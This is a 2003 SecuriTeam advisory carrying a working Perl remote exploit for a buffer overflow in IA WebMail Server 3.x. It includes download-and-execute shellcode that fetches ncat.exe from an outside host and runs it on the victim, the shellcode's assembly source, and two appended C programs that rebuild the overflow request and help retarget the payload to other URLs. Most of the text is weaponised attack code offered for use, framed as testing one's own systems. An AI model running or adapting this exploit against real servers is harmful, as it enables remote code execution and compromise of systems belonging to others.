[EXPL] IA WebMail Server Buffer Overflow Vulnerability (Exploit)

From: SecuriTeam (support_at_securiteam.com)
Date: 11/19/03

To: list@securiteam.com
Date: 19 Nov 2003 12:05:58 +0200

    The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com

      IA WebMail Server Buffer Overflow Vulnerability (Exploit)
    ------------------------------------------------------------------------

    SUMMARY

    As we reported in our previous article, IA WebMail Server Buffer Overflow
    Vulnerability <http://www.securiteam.com/windowsntfocus/6B002158UQ.html>,
    an exploitable buffer overflow exists in the product that allows remote
    attackers to execute arbitrary code. The exploit code below sends a GET
    request with an oversized path: 1036 bytes of filler reach the saved
    frame pointer, the next four bytes overwrite the return address with a
    jmp esp inside iaregdll.dll, and execution lands on the shellcode that
    follows. The supplied shellcode resolves LoadLibraryA and GetProcAddress
    through the import table of iaregdll.dll, downloads a file with
    URLDownloadToFileA and runs it with WinExec. It can be used to test your
    own systems for the vulnerability. Note that, as shipped, the shellcode
    fetches a binary from a third-party site (www.elitehaven.net) and writes
    it to c:\nc.exe; reassemble it with a URL and path you control before
    testing, following the instructions in the shellcode listing.

    DETAILS

    Exploit:
    #!/usr/bin/perl -w
    #
    # IA WebMail 3.x (iaregdll.dll version 1.0.0.5) Remote Exploit
    #
    # By Peter Winter-Smith peter4020 hotmail.com
    # Shellcode included - will need reassembling to use different
    # urls and files etc.
    #
    # Tested against:
    # - Windows XP Home SP1
    # - Windows 2000 Pro SP4
    #
    # Shellcode should work each time, since it steals its addresses
    # from the iaregdll.dll module import tables.
    # Uses a very static jmp esp in iaregdll.dll - Should work on all
    # servers without alteration!
    #
    # If the remote server is running a firewall, the urldownloader
    # will be unable to spawn a shell, so for testing I recommend
    # that you close the firewalls, or get another shellcode which
    # will deal with this. This exploit is for PoC purposes only :o)
    #
    # Notes:
    # - WebMailsvr.exe exits without consuming 100% resources in most
    # cases.
    # - This has only been tested with IA WebMail 3.1, however it was
    # designed to exploit all versions.

    use IO::Socket;

    if(!($ARGV[1]))
    {
     print "Usage: iawebmail.pl <victim> <port>\n\n";
     exit;
    }

    $shellcode = "\x90\xEB\x3C\x5F\x55\x89\xE5\x81" .
                            "\xC4\xE8\xFF\xFF\xFF\x57\x31\xDB" .
                            "\xB3\x07\xB0\xFF\xFC\xF2\xAE\xFE" .
                            "\x47\xFF\xFE\xCB\x80\xFB\x01\x75" .
                            "\xF4\x5F\x57\x8D\x7F\x0B\x57\x8D" .
                            "\x7F\x13\x57\x8D\x7F\x08\x57\x8D" .
                            "\x7F\x23\x57\x8D\x7F\x09\x47\x57" .
                            "\x8D\x54\x24\x14\x52\xEB\x02\xEB" .
                            "\x52\x89\xD6\xFF\x36\xFF\x15\xDC" .
                            "\x51\x02\x10\x5A\x52\x8D\x72\xFC" .
                            "\xFF\x36\x50\xFF\x15\x14\x52\x02" .
                            "\x10\x5A\x52\x31\xC9\x51\x51\x8D" .
                            "\x72\xF0\xFF\x36\x8D\x72\xF4\xFF" .
                            "\x36\x51\xFF\xD0\x5A\x52\xFF\x72" .
                            "\xEC\xFF\x15\xDC\x51\x02\x10\x5A" .
                            "\x52\x8D\x72\xF8\xFF\x36\x50\xFF" .
                            "\x15\x14\x52\x02\x10\x5A\x52\x31" .
                            "\xC9\x41\x51\x8D\x72\xF0\xFF\x36" .
                            "\xFF\xD0\xCC\xE8\x6B\xFF\xFF\xFF" .
                            "\x55\x52\x4C\x4D\x4F\x4E\x2E\x44" .
                            "\x4C\x4C\xFF\x55\x52\x4C\x44\x6F" .
                            "\x77\x6E\x6C\x6F\x61\x64\x54\x6F" .
                            "\x46\x69\x6C\x65\x41\xFF\x57\x69" .
                            "\x6E\x45\x78\x65\x63\xFF\x68\x74" .
                            "\x74\x70\x3A\x2F\x2F\x77\x77\x77" .
                            "\x2E\x65\x6C\x69\x74\x65\x68\x61" .
                            "\x76\x65\x6E\x2E\x6E\x65\x74\x2F" .
                            "\x6E\x63\x61\x74\x2E\x65\x78\x65" .
                            "\xFF\x63\x3A\x5C\x6E\x63\x2E\x65" .
                            "\x78\x65\xFF\x6B\x65\x72\x6E\x65" .
                            "\x6C\x33\x32\x2E\x64\x6C\x6C\xFF";

    $victim = IO::Socket::INET->new(Proto    => 'tcp',
                                    PeerAddr => $ARGV[0],
                                    PeerPort => $ARGV[1])
        or die "Unable to connect to $ARGV[0] on port $ARGV[1]";

    # 1036 bytes of filler reach the saved EBP, the next 4 bytes overwrite
    # the saved return address with a jmp esp in iaregdll.dll (0x1002BD33,
    # sent little-endian), and the shellcode sits directly after it on the
    # stack where jmp esp lands.
    $ebp = "BBBB";
    $eip = "\x33\xBD\x02\x10";
    $exploit = "GET /" . "a"x1036 . $ebp . $eip . $shellcode . " HTTP/1.1\n\n";

    print $victim $exploit;

    print " + Malicious GET request sent ...\n";
    print " + Wait a moment now, then connect to $ARGV[0] on port 9999.\n";
    print "Done.\n";

    close($victim);
    exit;

    #####################################################################
    ## SHELLCODE #
    #####################################################################
    # ; IA WebMail 3.x Shellcode (iaregdll.dll version 1.0.0.5)
    # ; Url Download + Execute
    # ; By Peter Winter-Smith
    # ; [peter4020@hotmail.com]
    # ;
    # ; nasmw -fbin -o iashellcode.s iashellcode.asm
    #
    # bits 32
    #
    # int3
    # jmp short killnull
    #
    # next:
    # pop edi
    #
    # push ebp
    # mov ebp, esp
    # add esp, -24
    #
    # push edi
    #
    # xor ebx, ebx
    # mov bl, 07h
    # mov al, 0ffh
    #
    # cld
    # nullify:
    # repne scasb
    # inc byte [edi-01h]
    # dec bl
    # cmp bl, 01h
    # jne nullify
    #
    # pop edi
    #
    # push edi ; 'URLMON.DLL'
    # lea edi, [edi+11]
    # push edi ; 'URLDownloadToFileA'
    # lea edi, [edi+19]
    # push edi ; 'WinExec'
    # lea edi, [edi+08]
    # push edi ; 'http://www.elitehaven.net/ncat.exe'
    # lea edi, [edi+35]
    # push edi ; 'c:\nc.exe'
    # lea edi, [edi+09]
    # inc edi
    # push edi ; 'kernel32.dll'
    #
    # lea edx, [esp+20]
    # push edx
    #
    # jmp short over
    # killnull:
    # jmp short data
    # over:
    #
    # mov esi, edx
    # push dword [esi]
    #
    # call [100251DCh] ; LoadLibraryA
    #
    # pop edx
    # push edx
    # lea esi, [edx-04]
    # push dword [esi]
    #
    # push eax
    #
    # call [10025214h] ; GetProcAddress(URLMON.DLL, URLDownloadToFileA);
    #
    # pop edx
    # push edx
    #
    # xor ecx, ecx
    # push ecx
    # push ecx
    # lea esi, [edx-16] ; file path
    # push dword [esi]
    # lea esi, [edx-12] ; url
    # push dword [esi]
    # push ecx
    #
    # call eax
    #
    # pop edx
    # push edx
    #
    # push dword [edx-20]
    #
    # call [100251DCh] ; LoadLibraryA
    #
    # pop edx
    # push edx
    #
    #
    # lea esi, [edx-08]
    # push dword [esi] ; 'WinExec'
    # push eax ; kernel32.dll handle
    #
    # call [10025214h] ; GetProcAddress(kernel32.dll, WinExec);
    #
    # pop edx
    # push edx
    #
    # xor ecx, ecx
    # inc ecx
    # push ecx
    #
    # lea esi, [edx-16] ; file path
    # push dword [esi]
    #
    # call eax
    #
    # int3
    #
    #
    # data:
    # call next
    # db 'URLMON.DLL',0ffh
    # db 'URLDownloadToFileA',0ffh
    # db 'WinExec',0ffh
    # db 'http://www.elitehaven.net/ncat.exe',0ffh
    # ; When altering, you MUST be sure
    # ; to also alter the offsets in the 0ffh to null
    # ; byte search!
    # ; for example:
    # ; db 'http://www.site.com/someguy/trojan.exe',0ffh
    # ; count the length of the url, and add one for the 0ffh byte.
    # ; The above url is 38 bytes long, plus one for our null, is 39 bytes.
    # ; find the code saying (at the start of the shellcode):
    # ; push edi ; 'http://www.elitehaven.net/ncat.exe'
    # ; lea edi, [edi+35]
    # ; and make it:
    # ; push edi ; 'http://www.site.com/someguy/trojan.exe'
    # ; lea edi, [edi+39]
    # ; same goes for the filename below :o)
    # db 'c:\nc.exe',0ffh
    # db 'kernel32.dll',0ffh
    #####################################################################
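    The request layout used by the Perl exploit above, rebuilt as an added C
    example. This code is mine, not Peter Winter-Smith's or SecuriTeam's; the
    offsets, the return address and the 248 shellcode bytes are taken from the
    exploit as printed. What it adds is a bad-byte check over the part of the
    request that is copied into the overflowed buffer: the set of bytes that
    would cut the request line short (NUL, CR, LF, SPACE) is my assumption
    about how the server parses the request line, and TAB is deliberately left
    out because 0x09 occurs in the shellcode (lea edi,[edi+09]) and the
    exploit is reported to work with it.

```c
/*
 * Added example, not part of the advisory or the original exploit: rebuilds
 * "GET /" + filler + EBP + EIP + shellcode + " HTTP/1.1\n\n" and checks the
 * bytes that land in the request path for characters that would terminate
 * the request line before the overflow is reached.
 *
 * Assumption (mine): the server splits the request line on NUL, CR, LF and
 * SPACE, so those four are "bad bytes" for the path. TAB (0x09) is not on
 * the list because the advisory's shellcode contains it and is reported to
 * work.
 */
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define PAD_LEN   1036          /* "a" x 1036 in the Perl source                */
#define EBP_FILL  "BBBB"        /* overwrites the saved EBP                     */
#define RET_ADDR  0x1002BD33u   /* "\x33\xBD\x02\x10": jmp esp in iaregdll.dll  */

static const char kPrefix[] = "GET /";
static const char kSuffix[] = " HTTP/1.1\n\n";

/* The 248-byte URLDownloadToFileA + WinExec shellcode from the advisory. */
static const uint8_t kShellcode[] = {
    0x90,0xEB,0x3C,0x5F,0x55,0x89,0xE5,0x81,0xC4,0xE8,0xFF,0xFF,0xFF,0x57,0x31,0xDB,
    0xB3,0x07,0xB0,0xFF,0xFC,0xF2,0xAE,0xFE,0x47,0xFF,0xFE,0xCB,0x80,0xFB,0x01,0x75,
    0xF4,0x5F,0x57,0x8D,0x7F,0x0B,0x57,0x8D,0x7F,0x13,0x57,0x8D,0x7F,0x08,0x57,0x8D,
    0x7F,0x23,0x57,0x8D,0x7F,0x09,0x47,0x57,0x8D,0x54,0x24,0x14,0x52,0xEB,0x02,0xEB,
    0x52,0x89,0xD6,0xFF,0x36,0xFF,0x15,0xDC,0x51,0x02,0x10,0x5A,0x52,0x8D,0x72,0xFC,
    0xFF,0x36,0x50,0xFF,0x15,0x14,0x52,0x02,0x10,0x5A,0x52,0x31,0xC9,0x51,0x51,0x8D,
    0x72,0xF0,0xFF,0x36,0x8D,0x72,0xF4,0xFF,0x36,0x51,0xFF,0xD0,0x5A,0x52,0xFF,0x72,
    0xEC,0xFF,0x15,0xDC,0x51,0x02,0x10,0x5A,0x52,0x8D,0x72,0xF8,0xFF,0x36,0x50,0xFF,
    0x15,0x14,0x52,0x02,0x10,0x5A,0x52,0x31,0xC9,0x41,0x51,0x8D,0x72,0xF0,0xFF,0x36,
    0xFF,0xD0,0xCC,0xE8,0x6B,0xFF,0xFF,0xFF,0x55,0x52,0x4C,0x4D,0x4F,0x4E,0x2E,0x44,
    0x4C,0x4C,0xFF,0x55,0x52,0x4C,0x44,0x6F,0x77,0x6E,0x6C,0x6F,0x61,0x64,0x54,0x6F,
    0x46,0x69,0x6C,0x65,0x41,0xFF,0x57,0x69,0x6E,0x45,0x78,0x65,0x63,0xFF,0x68,0x74,
    0x74,0x70,0x3A,0x2F,0x2F,0x77,0x77,0x77,0x2E,0x65,0x6C,0x69,0x74,0x65,0x68,0x61,
    0x76,0x65,0x6E,0x2E,0x6E,0x65,0x74,0x2F,0x6E,0x63,0x61,0x74,0x2E,0x65,0x78,0x65,
    0xFF,0x63,0x3A,0x5C,0x6E,0x63,0x2E,0x65,0x78,0x65,0xFF,0x6B,0x65,0x72,0x6E,0x65,
    0x6C,0x33,0x32,0x2E,0x64,0x6C,0x6C,0xFF,
};

/* Bytes that would terminate the request path early (assumption above). */
int is_bad_byte(uint8_t b)
{
    return b == 0x00 || b == 0x0A || b == 0x0D || b == 0x20;
}

/* Index of the first bad byte in buf[0..len), or -1 if the span is clean. */
long find_bad_byte(const uint8_t *buf, size_t len)
{
    for (size_t i = 0; i < len; i++)
        if (is_bad_byte(buf[i]))
            return (long)i;
    return -1;
}

/* Offsets into the finished request, for cross-checking in a debugger. */
size_t ebp_offset(void)       { return sizeof kPrefix - 1 + PAD_LEN; }
size_t ret_addr_offset(void)  { return ebp_offset() + 4; }
size_t shellcode_offset(void) { return ret_addr_offset() + 4; }

/* Builds the request into out. Returns its length, or 0 if cap is too small. */
size_t build_request(uint8_t *out, size_t cap,
                     const uint8_t *sc, size_t sc_len, uint32_t ret_addr)
{
    size_t need = shellcode_offset() + sc_len + (sizeof kSuffix - 1);
    if (cap < need)
        return 0;
    uint8_t *p = out;
    memcpy(p, kPrefix, sizeof kPrefix - 1); p += sizeof kPrefix - 1;
    memset(p, 'a', PAD_LEN);                p += PAD_LEN;
    memcpy(p, EBP_FILL, 4);                 p += 4;
    for (int i = 0; i < 4; i++)             /* x86 is little-endian: 33 BD 02 10 */
        *p++ = (uint8_t)(ret_addr >> (8 * i));
    memcpy(p, sc, sc_len);                  p += sc_len;
    memcpy(p, kSuffix, sizeof kSuffix - 1);
    return need;
}

/* Only the bytes between "GET /" and " HTTP/1.1" reach the overflowed
 * buffer, so only that span is checked. Returns the request offset of the
 * first bad byte, or -1 if there is none. */
long check_request_path(const uint8_t *req, size_t len)
{
    size_t start = sizeof kPrefix - 1;
    size_t end   = len - (sizeof kSuffix - 1);
    long r = find_bad_byte(req + start, end - start);
    return r < 0 ? -1 : r + (long)start;
}

int main(void)
{
    uint8_t req[2048];
    size_t n = build_request(req, sizeof req, kShellcode, sizeof kShellcode, RET_ADDR);
    printf("request length    : %zu bytes\n", n);
    printf("saved EBP at      : +%zu\n", ebp_offset());
    printf("return address at : +%zu\n", ret_addr_offset());
    printf("shellcode at      : +%zu (%zu bytes)\n", shellcode_offset(), sizeof kShellcode);
    long bad = check_request_path(req, n);
    if (bad < 0)
        puts("path contains no NUL/CR/LF/SPACE: sends as a single request line");
    else
        printf("bad byte 0x%02X at offset %ld: the request line would be cut short\n",
               req[bad], bad);
    return bad < 0 ? 0 : 1;
}
```

    Build with a C99 compiler (for example cc -std=c99 -Wall) and run it; it
    prints the layout and exits non-zero if a bad byte is found. Run the same
    check after reassembling the shellcode with your own URL and file path,
    since a space in either would silently truncate the request at that point.
    The program deliberately does not open a socket; writing req to the target
    port is left to the Perl script above.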

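    The shellcode listing above keeps its strings NUL-free by ending each one
    with 0xFF and patching those bytes to zero at run time, and the comments
    at the end warn that every lea edi,[edi+N] step must be recomputed when a
    string changes. The following added C example (mine, not the advisory's
    or the original author's) builds that string table from a list, derives
    the lea step for each entry and the mov bl loop counter, and emulates the
    nullify loop so the result can be checked before reassembling. The six
    strings are the advisory's; the emulator bounds its scan by the table
    length, which the real repne scasb does not (it relies on whatever ecx
    holds), so that bound is my addition.

```c
/*
 * Added example, not part of the advisory or the original shellcode: derives
 * the string-table offsets and loop counter for the 0xFF-terminator scheme
 * and emulates the nullify loop that turns each 0xFF into a NUL.
 */
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define TERM 0xFF   /* placeholder terminator: the payload may not contain NUL */

/* Step from one string to the next: its length plus the terminator byte.
 * This is the N in `lea edi,[edi+N]`; the advisory's `lea edi,[edi+09]`
 * followed by `inc edi` for c:\nc.exe is the same value, 10. */
size_t lea_step(const char *s)
{
    return strlen(s) + 1;
}

/* Value for `mov bl, N`: the loop exits when bl reaches 1, so it patches
 * bl - 1 terminators, one per string (six strings -> mov bl, 7). */
unsigned loop_counter(size_t nstrings)
{
    return (unsigned)nstrings + 1;
}

/* Writes strs[0] TERM strs[1] TERM ... into out. Returns the table size, or
 * 0 if a string would not fit or itself contains the terminator byte. */
size_t build_table(const char *const *strs, size_t n, uint8_t *out, size_t cap)
{
    size_t pos = 0;
    for (size_t i = 0; i < n; i++) {
        size_t len = strlen(strs[i]);
        if (memchr(strs[i], TERM, len) != NULL || pos + len + 1 > cap)
            return 0;
        memcpy(out + pos, strs[i], len);
        pos += len;
        out[pos++] = TERM;
    }
    return pos;
}

/* Emulates the advisory's loop:
 *     mov bl, <counter> ; mov al, 0ffh ; cld
 * nullify:
 *     repne scasb        ; edi ends one past the 0xFF
 *     inc byte [edi-01h] ; 0xFF + 1 wraps to 0x00
 *     dec bl ; cmp bl, 01h ; jne nullify
 * Returns the number of terminators patched. */
size_t emulate_nullify(uint8_t *data, size_t len, unsigned bl)
{
    size_t edi = 0, patched = 0;
    while (bl != 1) {
        while (edi < len && data[edi] != TERM)   /* repne scasb */
            edi++;
        if (edi == len)                          /* ran off the table (my bound) */
            break;
        edi++;                                   /* scasb leaves edi past the match */
        data[edi - 1]++;                         /* inc byte [edi-1]: 0xFF -> 0x00 */
        patched++;
        bl--;
    }
    return patched;
}

int main(void)
{
    /* The six strings from the advisory's data section, in order. */
    const char *strs[] = {
        "URLMON.DLL", "URLDownloadToFileA", "WinExec",
        "http://www.elitehaven.net/ncat.exe", "c:\\nc.exe", "kernel32.dll",
    };
    size_t n = sizeof strs / sizeof strs[0];
    uint8_t table[256];
    size_t len = build_table(strs, n, table, sizeof table);

    printf("mov bl, %u\n", loop_counter(n));
    size_t off = 0;
    for (size_t i = 0; i < n; i++) {
        printf("push edi ; '%s' at data+%zu", strs[i], off);
        if (i + 1 < n)
            printf("   lea edi, [edi+%zu]", lea_step(strs[i]));
        putchar('\n');
        off += lea_step(strs[i]);
    }
    size_t patched = emulate_nullify(table, len, loop_counter(n));
    printf("%zu of %zu terminators patched; table starts with \"%s\"\n",
           patched, n, (const char *)table);
    return patched == n ? 0 : 1;
}
```

    Replace the strings in strs with your own URL and file path and the
    program prints the lea steps and the mov bl value to put into the
    assembly; a step that does not match the real string length leaves edi
    pointing into the middle of a string, and a loop counter that is too low
    leaves a 0xFF where LoadLibraryA or URLDownloadToFileA expects a NUL.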
    ADDITIONAL INFORMATION

    The information has been provided by Peter Winter-Smith
    <peter4020@hotmail.com>.

    ========================================

    This bulletin is sent to members of the SecuriTeam mailing list.
    To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
    In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

    ====================
    ====================

    DISCLAIMER:
    The information in this bulletin is provided "AS IS" without warranty of any kind.
    In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

